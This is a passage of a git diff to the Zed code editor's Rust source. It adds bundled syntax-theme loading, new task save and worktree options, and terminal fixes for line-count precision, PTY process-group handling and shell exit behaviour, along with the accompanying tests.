+#[cfg(feature = "bundled-themes")] +mod bundled_themes { + use std::collections::BTreeMap; + use std::sync::Arc; + + use gpui::{FontStyle, FontWeight, HighlightStyle, Hsla, Rgba, rgb}; + use serde::Deserialize; + + use super::SyntaxTheme; + + #[derive(Deserialize)] + struct ThemeFile { + themes: Vec, + } + + #[derive(Deserialize)] + struct ThemeEntry { + name: String, + style: ThemeStyle, + } + + #[derive(Deserialize)] + struct ThemeStyle { + syntax: BTreeMap, + } + + #[derive(Deserialize)] + struct SyntaxStyleEntry { + color: Option, + font_weight: Option, + font_style: Option, + } + + impl SyntaxStyleEntry { + fn to_highlight_style(&self) -> HighlightStyle { + HighlightStyle { + color: self.color.as_deref().map(hex_to_hsla), + font_weight: 
self.font_weight.map(FontWeight), + font_style: self.font_style.as_deref().and_then(|s| match s { + "italic" => Some(FontStyle::Italic), + "normal" => Some(FontStyle::Normal), + "oblique" => Some(FontStyle::Oblique), + _ => None, + }), + ..Default::default() + } + } + } + + fn hex_to_hsla(hex: &str) -> Hsla { + let hex = hex.trim_start_matches('#'); + let rgba: Rgba = match hex.len() { + 6 => rgb(u32::from_str_radix(hex, 16).unwrap_or(0)), + 8 => { + let value = u32::from_str_radix(hex, 16).unwrap_or(0); + Rgba { + r: ((value >> 24) & 0xff) as f32 / 255.0, + g: ((value >> 16) & 0xff) as f32 / 255.0, + b: ((value >> 8) & 0xff) as f32 / 255.0, + a: (value & 0xff) as f32 / 255.0, + } + } + _ => rgb(0), + }; + rgba.into() + } + + fn load_theme(json: &str, theme_name: &str) -> Arc { + let theme_file: ThemeFile = serde_json::from_str(json).expect("failed to parse theme JSON"); + let theme_entry = theme_file + .themes + .iter() + .find(|entry| entry.name == theme_name) + .unwrap_or_else(|| panic!("theme {theme_name:?} not found in theme JSON")); + + let highlights = theme_entry + .style + .syntax + .iter() + .map(|(name, entry)| (name.clone(), entry.to_highlight_style())); + + Arc::new(SyntaxTheme::new(highlights)) + } + + impl SyntaxTheme { + /// Load the "One Dark" syntax theme from the bundled theme JSON. + pub fn one_dark() -> Arc { + load_theme( + include_str!("../../../assets/themes/one/one.json"), + "One Dark", + ) + } + } +} + +#[cfg(test)] +mod tests { + use gpui::FontStyle; + + use super::*; + + #[test] + fn test_syntax_theme_merge() { + // Merging into an empty `SyntaxTheme` keeps all the user-defined styles. 
+ let syntax_theme = SyntaxTheme::merge( + Arc::new(SyntaxTheme::new_test([])), + vec![ + ( + "foo".to_string(), + HighlightStyle { + color: Some(gpui::red()), + ..Default::default() + }, + ), + ( + "foo.bar".to_string(), + HighlightStyle { + color: Some(gpui::green()), + ..Default::default() + }, + ), + ], + ); + assert_eq!( + syntax_theme, + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::red()), + ("foo.bar", gpui::green()) + ])) + ); + + // Merging empty user-defined styles keeps all the base styles. + let syntax_theme = SyntaxTheme::merge( + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::blue()), + ("foo.bar", gpui::red()), + ])), + Vec::new(), + ); + assert_eq!( + syntax_theme, + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::blue()), + ("foo.bar", gpui::red()) + ])) + ); + + let syntax_theme = SyntaxTheme::merge( + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::red()), + ("foo.bar", gpui::green()), + ])), + vec![( + "foo.bar".to_string(), + HighlightStyle { + color: Some(gpui::yellow()), + ..Default::default() + }, + )], + ); + assert_eq!( + syntax_theme, + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::red()), + ("foo.bar", gpui::yellow()) + ])) + ); + + let syntax_theme = SyntaxTheme::merge( + Arc::new(SyntaxTheme::new_test([ + ("foo", gpui::red()), + ("foo.bar", gpui::green()), + ])), + vec![( + "foo.bar".to_string(), + HighlightStyle { + font_style: Some(FontStyle::Italic), + ..Default::default() + }, + )], + ); + assert_eq!( + syntax_theme, + Arc::new(SyntaxTheme::new_test_styles([ + ( + "foo", + HighlightStyle { + color: Some(gpui::red()), + ..Default::default() + } + ), + ( + "foo.bar", + HighlightStyle { + color: Some(gpui::green()), + font_style: Some(FontStyle::Italic), + ..Default::default() + } + ) + ])) + ); + } +} diff --git a/crates/tab_switcher/Cargo.toml b/crates/tab_switcher/Cargo.toml index 36e4ba77342796ae5967e81cd34e01b8d41aecf6..8855c8869ab52260be668c45c20e5af7a869433f 100644 --- a/crates/tab_switcher/Cargo.toml +++ 
b/crates/tab_switcher/Cargo.toml @@ -29,11 +29,10 @@ util.workspace = true workspace.workspace = true [dev-dependencies] -anyhow.workspace = true ctor.workspace = true gpui = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } serde_json.workspace = true theme = { workspace = true, features = ["test-support"] } +theme_settings.workspace = true workspace = { workspace = true, features = ["test-support"] } zlog.workspace = true diff --git a/crates/tab_switcher/src/tab_switcher.rs b/crates/tab_switcher/src/tab_switcher.rs index 0fb13c85d21797e4d57728c88fc8bb014a898f78..d1e19ea4faee8d8259d06e2c24875faac7a0117c 100644 --- a/crates/tab_switcher/src/tab_switcher.rs +++ b/crates/tab_switcher/src/tab_switcher.rs @@ -875,7 +875,7 @@ impl PickerDelegate for TabSwitcherDelegate { el.end_slot::(close_button) } else { el.end_slot::(indicator) - .end_hover_slot::(close_button) + .end_slot_on_hover::(close_button) } }), ) diff --git a/crates/tab_switcher/src/tab_switcher_tests.rs b/crates/tab_switcher/src/tab_switcher_tests.rs index e1e3f138252e4dc41aa67d9d5b848eac773d5f4f..4c6cdce17ee32c558c203c51f608e3a654a344cd 100644 --- a/crates/tab_switcher/src/tab_switcher_tests.rs +++ b/crates/tab_switcher/src/tab_switcher_tests.rs @@ -223,8 +223,8 @@ async fn test_close_selected_item(cx: &mut gpui::TestAppContext) { // 1.txt | [3.txt] | 2.txt | 4.txt // // With 3.txt being the active item in the pane. 
- cx.dispatch_action(ActivatePreviousItem); - cx.dispatch_action(ActivatePreviousItem); + cx.dispatch_action(ActivatePreviousItem::default()); + cx.dispatch_action(ActivatePreviousItem::default()); cx.run_until_parked(); cx.simulate_modifiers_change(Modifiers::control()); @@ -258,7 +258,7 @@ async fn test_close_selected_item(cx: &mut gpui::TestAppContext) { fn init_test(cx: &mut TestAppContext) -> Arc { cx.update(|cx| { let state = AppState::test(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); super::init(cx); editor::init(cx); state diff --git a/crates/task/src/task.rs b/crates/task/src/task.rs index a8eccc9af1d7f8b00fb8557bb02c05281c5bb2e6..5126d5e89f723f0a9612c2033a789c569111b20a 100644 --- a/crates/task/src/task.rs +++ b/crates/task/src/task.rs @@ -23,8 +23,8 @@ pub use debug_format::{ Request, TcpArgumentsTemplate, ZedDebugConfig, }; pub use task_template::{ - DebugArgsRequest, HideStrategy, RevealStrategy, TaskTemplate, TaskTemplates, - substitute_variables_in_map, substitute_variables_in_str, + DebugArgsRequest, HideStrategy, RevealStrategy, SaveStrategy, TaskHook, TaskTemplate, + TaskTemplates, substitute_variables_in_map, substitute_variables_in_str, }; pub use util::shell::{Shell, ShellKind}; pub use util::shell_builder::ShellBuilder; @@ -75,6 +75,8 @@ pub struct SpawnInTerminal { pub show_command: bool, /// Whether to show the rerun button in the terminal tab. pub show_rerun: bool, + /// Which edited buffers to save before running the task. + pub save: SaveStrategy, } impl SpawnInTerminal { @@ -172,11 +174,17 @@ pub enum VariableName { Column, /// Text from the latest selection. SelectedText, + /// The language of the currently opened buffer (e.g., "Rust", "Python"). 
+ Language, /// The symbol selected by the symbol tagging system, specifically the @run capture in a runnables.scm RunnableSymbol, /// Open a Picker to select a process ID to use in place /// Can only be used to debug configurations PickProcessId, + /// An absolute path of the main (original) git worktree for the current repository. + /// For normal checkouts, this equals the worktree root. For linked worktrees, + /// this is the original repo's working directory. + MainGitWorktree, /// Custom variable, provided by the plugin or other external source. /// Will be printed with `CUSTOM_` prefix to avoid potential conflicts with other variables. Custom(Cow<'static, str>), @@ -209,8 +217,10 @@ impl FromStr for VariableName { "SYMBOL" => Self::Symbol, "RUNNABLE_SYMBOL" => Self::RunnableSymbol, "SELECTED_TEXT" => Self::SelectedText, + "LANGUAGE" => Self::Language, "ROW" => Self::Row, "COLUMN" => Self::Column, + "MAIN_GIT_WORKTREE" => Self::MainGitWorktree, _ => { if let Some(custom_name) = without_prefix.strip_prefix(ZED_CUSTOM_VARIABLE_NAME_PREFIX) @@ -243,8 +253,10 @@ impl std::fmt::Display for VariableName { Self::Row => write!(f, "{ZED_VARIABLE_NAME_PREFIX}ROW"), Self::Column => write!(f, "{ZED_VARIABLE_NAME_PREFIX}COLUMN"), Self::SelectedText => write!(f, "{ZED_VARIABLE_NAME_PREFIX}SELECTED_TEXT"), + Self::Language => write!(f, "{ZED_VARIABLE_NAME_PREFIX}LANGUAGE"), Self::RunnableSymbol => write!(f, "{ZED_VARIABLE_NAME_PREFIX}RUNNABLE_SYMBOL"), Self::PickProcessId => write!(f, "{ZED_VARIABLE_NAME_PREFIX}PICK_PID"), + Self::MainGitWorktree => write!(f, "{ZED_VARIABLE_NAME_PREFIX}MAIN_GIT_WORKTREE"), Self::Custom(s) => write!( f, "{ZED_VARIABLE_NAME_PREFIX}{ZED_CUSTOM_VARIABLE_NAME_PREFIX}{s}" diff --git a/crates/task/src/task_template.rs b/crates/task/src/task_template.rs index 539b2779cc85b5830af90aeb4ffd28596c2c29c3..25fde261f106d57eef94c4d2ef7cad57b3a7ecd0 100644 --- a/crates/task/src/task_template.rs +++ b/crates/task/src/task_template.rs @@ -72,6 +72,12 @@ pub 
struct TaskTemplate { /// Whether to show the command line in the task output. #[serde(default = "default_true")] pub show_command: bool, + /// Which edited buffers to save before running the task. + #[serde(default)] + pub save: SaveStrategy, + /// Hooks that this task runs when emitted. + #[serde(default)] + pub hooks: HashSet, } #[derive(Deserialize, Eq, PartialEq, Clone, Debug)] @@ -83,6 +89,14 @@ pub enum DebugArgsRequest { Attach(AttachRequest), } +/// What to do with the terminal pane and tab, after the command was started. +#[derive(Clone, Copy, Debug, PartialEq, Hash, Eq, Serialize, Deserialize, JsonSchema)] +#[serde(rename_all = "snake_case")] +pub enum TaskHook { + #[serde(alias = "create_git_worktree")] + CreateWorktree, +} + /// What to do with the terminal pane and tab, after the command was started. #[derive(Default, Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] @@ -109,11 +123,25 @@ pub enum HideStrategy { OnSuccess, } +/// Which edited buffers to save before running a task. +#[derive(Default, Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize, JsonSchema)] +#[serde(rename_all = "snake_case")] +pub enum SaveStrategy { + /// Save all edited buffers. + All, + /// Save the current buffer. + Current, + #[default] + /// Don't save any buffers. + None, +} + /// A group of Tasks defined in a JSON file. #[derive(Clone, Debug, Default, PartialEq, Eq, Serialize, Deserialize, JsonSchema)] pub struct TaskTemplates(pub Vec); impl TaskTemplates { + pub const FILE_NAME: &str = "tasks.json"; /// Generates JSON schema of Tasks JSON template format. 
pub fn generate_json_schema() -> serde_json::Value { let schema = schemars::generate::SchemaSettings::draft2019_09() @@ -270,6 +298,7 @@ impl TaskTemplate { show_summary: self.show_summary, show_command: self.show_command, show_rerun: true, + save: self.save, }, }) } @@ -1071,7 +1100,6 @@ mod tests { command, ..TaskTemplate::default() }; - assert!(task.unknown_variables().is_empty()); } } diff --git a/crates/tasks_ui/src/modal.rs b/crates/tasks_ui/src/modal.rs index 6b4fc21ef3ede0482c9eb3ac6b8dd9c000b7f7d4..285a07c9562849b26b4cbba3de3979614384d875 100644 --- a/crates/tasks_ui/src/modal.rs +++ b/crates/tasks_ui/src/modal.rs @@ -184,23 +184,11 @@ impl TasksModal { }; let mut new_candidates = used_tasks; new_candidates.extend(lsp_tasks); - let hide_vscode = current_resolved_tasks.iter().any(|(kind, _)| match kind { - TaskSourceKind::Worktree { - id: _, - directory_in_worktree: dir, - id_base: _, - } => dir.file_name().is_some_and(|name| name == ".zed"), - _ => false, - }); // todo(debugger): We're always adding lsp tasks here even if prefer_lsp is false // We should move the filter to new_candidates instead of on current // and add a test for this new_candidates.extend(current_resolved_tasks.into_iter().filter(|(task_kind, _)| { match task_kind { - TaskSourceKind::Worktree { - directory_in_worktree: dir, - .. - } => !(hide_vscode && dir.file_name().is_some_and(|name| name == ".vscode")), TaskSourceKind::Language { .. 
} => add_current_language_tasks, _ => true, } @@ -582,7 +570,7 @@ impl PickerDelegate for TasksModalDelegate { Tooltip::simple("Delete Previously Scheduled Task", cx) }), ); - item.end_hover_slot(delete_button) + item.end_slot_on_hover(delete_button) } else { item } diff --git a/crates/tasks_ui/src/tasks_ui.rs b/crates/tasks_ui/src/tasks_ui.rs index 29e6a9de7fab9b5421fe38fee0fd24fd43b12ccc..ca8ebb5248e4e6d77a05efab8d43dbfbd8d02eca 100644 --- a/crates/tasks_ui/src/tasks_ui.rs +++ b/crates/tasks_ui/src/tasks_ui.rs @@ -204,19 +204,19 @@ where else { return Task::ready(Vec::new()); }; - let (file, language) = task_contexts + let (language, buffer) = task_contexts .location() .map(|location| { - let buffer = location.buffer.read(cx); + let buffer = location.buffer.clone(); ( - buffer.file().cloned(), - buffer.language_at(location.range.start), + buffer.read(cx).language_at(location.range.start), + Some(buffer), ) }) .unwrap_or_default(); task_inventory .read(cx) - .list_tasks(file, language, task_contexts.worktree(), cx) + .list_tasks(buffer, language, task_contexts.worktree(), cx) })? 
.await; @@ -316,16 +316,16 @@ pub fn task_contexts( let lsp_task_sources = active_editor .as_ref() - .map(|active_editor| active_editor.update(cx, |editor, cx| editor.lsp_task_sources(cx))) + .map(|active_editor| { + active_editor.update(cx, |editor, cx| editor.lsp_task_sources(false, false, cx)) + }) .unwrap_or_default(); - let latest_selection = active_editor.as_ref().map(|active_editor| { - active_editor - .read(cx) - .selections - .newest_anchor() - .head() - .text_anchor + let latest_selection = active_editor.as_ref().and_then(|active_editor| { + let snapshot = active_editor.read(cx).buffer().read(cx).snapshot(cx); + snapshot + .anchor_to_buffer_anchor(active_editor.read(cx).selections.newest_anchor().head()) + .map(|(anchor, _)| anchor) }); let mut worktree_abs_paths = workspace @@ -434,10 +434,15 @@ mod tests { ) .await; let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; - let worktree_store = project.read_with(cx, |project, _| project.worktree_store()); + let (worktree_store, git_store) = project.read_with(cx, |project, _| { + (project.worktree_store(), project.git_store().clone()) + }); let rust_language = Arc::new( Language::new( - LanguageConfig::default(), + LanguageConfig { + name: "Rust".into(), + ..Default::default() + }, Some(tree_sitter_rust::LANGUAGE.into()), ) .with_outline_query( @@ -448,12 +453,16 @@ mod tests { .unwrap() .with_context_provider(Some(Arc::new(BasicContextProvider::new( worktree_store.clone(), + git_store.clone(), )))), ); let typescript_language = Arc::new( Language::new( - LanguageConfig::default(), + LanguageConfig { + name: "TypeScript".into(), + ..Default::default() + }, Some(tree_sitter_typescript::LANGUAGE_TYPESCRIPT.into()), ) .with_outline_query( @@ -468,6 +477,7 @@ mod tests { .unwrap() .with_context_provider(Some(Arc::new(BasicContextProvider::new( worktree_store.clone(), + git_store.clone(), )))), ); @@ -532,6 +542,7 @@ mod tests { (VariableName::WorktreeRoot, path!("/dir").into()), 
(VariableName::Row, "1".into()), (VariableName::Column, "1".into()), + (VariableName::Language, "Rust".into()), ]), project_env: HashMap::default(), } @@ -566,6 +577,7 @@ mod tests { (VariableName::Column, "15".into()), (VariableName::SelectedText, "is_i".into()), (VariableName::Symbol, "this_is_a_rust_file".into()), + (VariableName::Language, "Rust".into()), ]), project_env: HashMap::default(), } @@ -594,6 +606,7 @@ mod tests { (VariableName::Row, "1".into()), (VariableName::Column, "1".into()), (VariableName::Symbol, "this_is_a_test".into()), + (VariableName::Language, "TypeScript".into()), ]), project_env: HashMap::default(), } diff --git a/crates/terminal/Cargo.toml b/crates/terminal/Cargo.toml index ee29546b81c32038e85805850bc07111fca81af7..8a598c1d7730ef59c19085f73cc65bd955ad4e35 100644 --- a/crates/terminal/Cargo.toml +++ b/crates/terminal/Cargo.toml @@ -37,6 +37,7 @@ sysinfo.workspace = true smol.workspace = true task.workspace = true theme.workspace = true +theme_settings.workspace = true thiserror.workspace = true url.workspace = true util.workspace = true @@ -49,6 +50,5 @@ windows.workspace = true [dev-dependencies] gpui = { workspace = true, features = ["test-support"] } rand.workspace = true -serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } util_macros.workspace = true diff --git a/crates/terminal/src/pty_info.rs b/crates/terminal/src/pty_info.rs index 2663095c52f386cfd9528f1c96fa32a39abd9a59..7b6676760ca61c1cfde22601d0c0eb0b9641b42a 100644 --- a/crates/terminal/src/pty_info.rs +++ b/crates/terminal/src/pty_info.rs @@ -36,11 +36,19 @@ impl ProcessIdGetter { } fn pid(&self) -> Option { + // Negative pid means error. + // Zero pid means no foreground process group is set on the PTY yet. + // Avoid killing the current process by returning a zero pid. 
let pid = unsafe { libc::tcgetpgrp(self.handle) }; - if pid < 0 { + if pid > 0 { + return Some(Pid::from_u32(pid as u32)); + } + + if self.fallback_pid > 0 { return Some(Pid::from_u32(self.fallback_pid)); } - Some(Pid::from_u32(pid as u32)) + + None } } diff --git a/crates/terminal/src/terminal.rs b/crates/terminal/src/terminal.rs index 0fa3b37e1501ed6407d18b07e0b2188ce5e77cf7..b620f5f03c2debf19cdc4856da8c039fe690651f 100644 --- a/crates/terminal/src/terminal.rs +++ b/crates/terminal/src/terminal.rs @@ -207,11 +207,16 @@ impl TerminalBounds { } pub fn num_lines(&self) -> usize { - (self.bounds.size.height / self.line_height).floor() as usize + // Tolerance to prevent f32 precision from losing a row: + // `N * line_height / line_height` can be N-epsilon, which floor() + // would round down, pushing the first line into invisible scrollback. + let raw = self.bounds.size.height / self.line_height; + raw.next_up().floor() as usize } pub fn num_columns(&self) -> usize { - (self.bounds.size.width / self.cell_width).floor() as usize + let raw = self.bounds.size.width / self.cell_width; + raw.next_up().floor() as usize } pub fn height(&self) -> Pixels { @@ -412,9 +417,12 @@ impl TerminalBuilder { window_id, }, child_exited: None, + keyboard_input_sent: false, event_loop_task: Task::ready(Ok(())), background_executor: background_executor.clone(), path_style, + #[cfg(any(test, feature = "test-support"))] + input_log: Vec::new(), }; Ok(TerminalBuilder { @@ -643,9 +651,12 @@ impl TerminalBuilder { window_id, }, child_exited: None, + keyboard_input_sent: false, event_loop_task: Task::ready(Ok(())), background_executor, path_style, + #[cfg(any(test, feature = "test-support"))] + input_log: Vec::new(), }; if !activation_script.is_empty() && no_task { @@ -867,9 +878,12 @@ pub struct Terminal { template: CopyTemplate, activation_script: Vec, child_exited: Option, + keyboard_input_sent: bool, event_loop_task: Task>, background_executor: BackgroundExecutor, path_style: PathStyle, + 
#[cfg(any(test, feature = "test-support"))] + input_log: Vec>, } struct CopyTemplate { @@ -1451,9 +1465,19 @@ impl Terminal { .push_back(InternalEvent::Scroll(AlacScroll::Bottom)); self.events.push_back(InternalEvent::SetSelection(None)); + self.keyboard_input_sent = true; + let input = input.into(); + #[cfg(any(test, feature = "test-support"))] + self.input_log.push(input.to_vec()); + self.write_to_pty(input); } + #[cfg(any(test, feature = "test-support"))] + pub fn take_input_log(&mut self) -> Vec> { + std::mem::take(&mut self.input_log) + } + pub fn toggle_vi_mode(&mut self) { self.events.push_back(InternalEvent::ToggleViMode); } @@ -1925,7 +1949,7 @@ impl Terminal { MouseButton::Middle => { if let Some(item) = _cx.read_from_primary() { let text = item.text().unwrap_or_default(); - self.input(text.into_bytes()); + self.paste(&text); } } _ => {} @@ -2225,7 +2249,17 @@ impl Terminal { let task = match &mut self.task { Some(task) => task, None => { - if self.child_exited.is_none_or(|e| e.code() == Some(0)) { + // For interactive shells (no task), we need to differentiate: + // 1. User-initiated exits (typed "exit", Ctrl+D, etc.) - always close, + // even if the shell exits with a non-zero code (e.g. after `false`). + // 2. Shell spawn failures (bad $SHELL) - don't close, so the user sees + // the error. Spawn failures never receive keyboard input. 
+ let should_close = if self.keyboard_input_sent { + true + } else { + self.child_exited.is_none_or(|e| e.code() == Some(0)) + }; + if should_close { cx.emit(Event::CloseTerminal); } return; @@ -2536,16 +2570,16 @@ mod tests { Point, TestAppContext, bounds, point, size, }; use parking_lot::Mutex; - use rand::{Rng, distr, rngs::ThreadRng}; + use rand::{Rng, distr, rngs::StdRng}; use smol::channel::Receiver; use task::{Shell, ShellBuilder}; - #[cfg(target_os = "macos")] + #[cfg(not(target_os = "windows"))] fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings_store = settings::SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } @@ -2775,6 +2809,68 @@ mod tests { ); } + #[cfg(not(target_os = "windows"))] + #[gpui::test(iterations = 10)] + async fn test_terminal_closes_after_nonzero_exit(cx: &mut TestAppContext) { + init_test(cx); + + cx.executor().allow_parking(); + + let builder = cx + .update(|cx| { + TerminalBuilder::new( + None, + None, + task::Shell::System, + HashMap::default(), + CursorShape::default(), + AlternateScroll::On, + None, + vec![], + 0, + false, + 0, + None, + cx, + Vec::new(), + PathStyle::local(), + ) + }) + .await + .unwrap(); + let terminal = cx.new(|cx| builder.subscribe(cx)); + + let (event_tx, event_rx) = smol::channel::unbounded::(); + cx.update(|cx| { + cx.subscribe(&terminal, move |_, e, _| { + event_tx.send_blocking(e.clone()).unwrap(); + }) + }) + .detach(); + + let first_event = event_rx.recv().await.expect("No wakeup event received"); + + terminal.update(cx, |terminal, _| { + terminal.input(b"false\r".to_vec()); + }); + cx.executor().timer(Duration::from_millis(500)).await; + terminal.update(cx, |terminal, _| { + terminal.input(b"exit\r".to_vec()); + }); + + let mut all_events = vec![first_event]; + while let Ok(new_event) = event_rx.recv().await { + all_events.push(new_event.clone()); + if new_event == 
Event::CloseTerminal { + break; + } + } + assert!( + all_events.contains(&Event::CloseTerminal), + "Shell exiting after `false && exit` should close terminal, but got events: {all_events:?}", + ); + } + #[gpui::test(iterations = 10)] async fn test_terminal_no_exit_on_spawn_failure(cx: &mut TestAppContext) { cx.executor().allow_parking(); @@ -2857,9 +2953,8 @@ mod tests { } } - #[test] - fn test_mouse_to_cell_test() { - let mut rng = rand::rng(); + #[gpui::test] + fn test_mouse_to_cell_test(mut rng: StdRng) { const ITERATIONS: usize = 10; const PRECISION: usize = 1000; @@ -2907,10 +3002,8 @@ mod tests { } } - #[test] - fn test_mouse_to_cell_clamp() { - let mut rng = rand::rng(); - + #[gpui::test] + fn test_mouse_to_cell_clamp(mut rng: StdRng) { let size = crate::TerminalBounds { cell_width: Pixels::from(10.), line_height: Pixels::from(10.), @@ -2941,12 +3034,12 @@ mod tests { ); } - fn get_cells(size: TerminalBounds, rng: &mut ThreadRng) -> Vec> { + fn get_cells(size: TerminalBounds, rng: &mut StdRng) -> Vec> { let mut cells = Vec::new(); - for _ in 0..((size.height() / size.line_height()) as usize) { + for _ in 0..size.num_lines() { let mut row_vec = Vec::new(); - for _ in 0..((size.width() / size.cell_width()) as usize) { + for _ in 0..size.num_columns() { let cell_char = rng.sample(distr::Alphanumeric) as char; row_vec.push(cell_char) } @@ -3349,5 +3442,59 @@ mod tests { scroll_by(-1); } } + + #[test] + fn test_num_lines_float_precision() { + let line_heights = [ + 20.1f32, 16.7, 18.3, 22.9, 14.1, 15.6, 17.8, 19.4, 21.3, 23.7, + ]; + for &line_height in &line_heights { + for n in 1..=100 { + let height = n as f32 * line_height; + let bounds = TerminalBounds::new( + px(line_height), + px(8.0), + Bounds { + origin: Point::default(), + size: Size { + width: px(800.0), + height: px(height), + }, + }, + ); + assert_eq!( + bounds.num_lines(), + n, + "num_lines() should be {n} for height={height}, line_height={line_height}" + ); + } + } + } + + #[test] + fn 
test_num_columns_float_precision() { + let cell_widths = [8.1f32, 7.3, 9.7, 6.9, 10.1]; + for &cell_width in &cell_widths { + for n in 1..=200 { + let width = n as f32 * cell_width; + let bounds = TerminalBounds::new( + px(20.0), + px(cell_width), + Bounds { + origin: Point::default(), + size: Size { + width: px(width), + height: px(400.0), + }, + }, + ); + assert_eq!( + bounds.num_columns(), + n, + "num_columns() should be {n} for width={width}, cell_width={cell_width}" + ); + } + } + } } } diff --git a/crates/terminal/src/terminal_hyperlinks.rs b/crates/terminal/src/terminal_hyperlinks.rs index d239f680f9e2ecbd3d320e731d3cc74303a552ed..0ca6cb2edd916019a4a7822830faa1fdfaa238f3 100644 --- a/crates/terminal/src/terminal_hyperlinks.rs +++ b/crates/terminal/src/terminal_hyperlinks.rs @@ -905,6 +905,18 @@ mod tests { ); } + #[test] + // + fn issue_50531() { + // Paths preceded by "N:" prefix (e.g. grep output line numbers) + // should still be clickable + test_path!("0: ‹«foo/👉bar.txt»›"); + test_path!("0: ‹«👉foo/bar.txt»›"); + test_path!("42: ‹«👉foo/bar.txt»›"); + test_path!("1: ‹«/👉test/cool.rs»›"); + test_path!("1: ‹«/👉test/cool.rs»:«4»:«2»›"); + } + #[test] // fn issue_46795() { diff --git a/crates/terminal/src/terminal_settings.rs b/crates/terminal/src/terminal_settings.rs index 45f22319869381ae497e64c2f8e65abed6fe9d69..ec784d466b1f97ba2e44231aaef7475d62981479 100644 --- a/crates/terminal/src/terminal_settings.rs +++ b/crates/terminal/src/terminal_settings.rs @@ -14,7 +14,7 @@ use settings::{ merge_from::MergeFrom, }; use task::Shell; -use theme::FontFamilyName; +use theme_settings::FontFamilyName; #[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] pub struct Toolbar { @@ -40,6 +40,7 @@ pub struct TerminalSettings { pub keep_selection_on_copy: bool, pub button: bool, pub dock: TerminalDockPosition, + pub flexible: bool, pub default_width: Pixels, pub default_height: Pixels, pub detect_venv: VenvSettings, @@ -50,6 +51,7 @@ pub struct 
TerminalSettings { pub minimum_contrast: f32, pub path_hyperlink_regexes: Vec, pub path_hyperlink_timeout_ms: u64, + pub show_count_badge: bool, } #[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)] @@ -109,6 +111,7 @@ impl settings::Settings for TerminalSettings { dock: user_content.dock.unwrap(), default_width: px(user_content.default_width.unwrap()), default_height: px(user_content.default_height.unwrap()), + flexible: user_content.flexible.unwrap(), detect_venv: project_content.detect_venv.unwrap(), scroll_multiplier: user_content.scroll_multiplier.unwrap(), max_scroll_history_lines: user_content.max_scroll_history_lines, @@ -129,6 +132,7 @@ impl settings::Settings for TerminalSettings { }) .collect(), path_hyperlink_timeout_ms: project_content.path_hyperlink_timeout_ms.unwrap(), + show_count_badge: user_content.show_count_badge.unwrap(), } } } diff --git a/crates/terminal_view/Cargo.toml b/crates/terminal_view/Cargo.toml index ef31480341ddc873e00612b471217899836a3bd1..f74d8b83883a1186d91855429c40f375bfa22526 100644 --- a/crates/terminal_view/Cargo.toml +++ b/crates/terminal_view/Cargo.toml @@ -18,7 +18,6 @@ doctest = false [dependencies] anyhow.workspace = true async-recursion.workspace = true -assistant_slash_command.workspace = true breadcrumbs.workspace = true collections.workspace = true db.workspace = true @@ -42,17 +41,17 @@ settings.workspace = true shellexpand.workspace = true terminal.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true zed_actions.workspace = true [dev-dependencies] -client = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } project = { workspace = true, features = ["test-support"] } -rand.workspace = true +terminal = { workspace = true, features = ["test-support"] } workspace = { workspace = true, 
features = ["test-support"] } [package.metadata.cargo-machete] diff --git a/crates/terminal_view/src/persistence.rs b/crates/terminal_view/src/persistence.rs index 1c215c1703278c8e54046ea305273242570c6b7f..50b1e350fa91a4936691b5a35efe0a1666aba9cc 100644 --- a/crates/terminal_view/src/persistence.rs +++ b/crates/terminal_view/src/persistence.rs @@ -6,7 +6,7 @@ use gpui::{AppContext as _, AsyncWindowContext, Axis, Entity, Task, WeakEntity}; use project::Project; use serde::{Deserialize, Serialize}; use std::path::PathBuf; -use ui::{App, Context, Pixels, Window}; +use ui::{App, Context, Window}; use util::ResultExt as _; use db::{ @@ -97,12 +97,7 @@ pub(crate) fn deserialize_terminal_panel( ) -> Task>> { window.spawn(cx, async move |cx| { let terminal_panel = workspace.update_in(cx, |workspace, window, cx| { - cx.new(|cx| { - let mut panel = TerminalPanel::new(workspace, window, cx); - panel.height = serialized_panel.height.map(|h| h.round()); - panel.width = serialized_panel.width.map(|w| w.round()); - panel - }) + cx.new(|cx| TerminalPanel::new(workspace, window, cx)) })?; match &serialized_panel.items { SerializedItems::NoSplits(item_ids) => { @@ -317,8 +312,6 @@ pub(crate) struct SerializedTerminalPanel { pub items: SerializedItems, // A deprecated field, kept for backwards compatibility for the code before terminal splits were introduced. pub active_item_id: Option, - pub width: Option, - pub height: Option, } #[derive(Debug, Serialize, Deserialize)] @@ -425,7 +418,7 @@ impl Domain for TerminalDb { ]; } -db::static_connection!(TERMINAL_DB, TerminalDb, [WorkspaceDb]); +db::static_connection!(TerminalDb, [WorkspaceDb]); impl TerminalDb { query! 
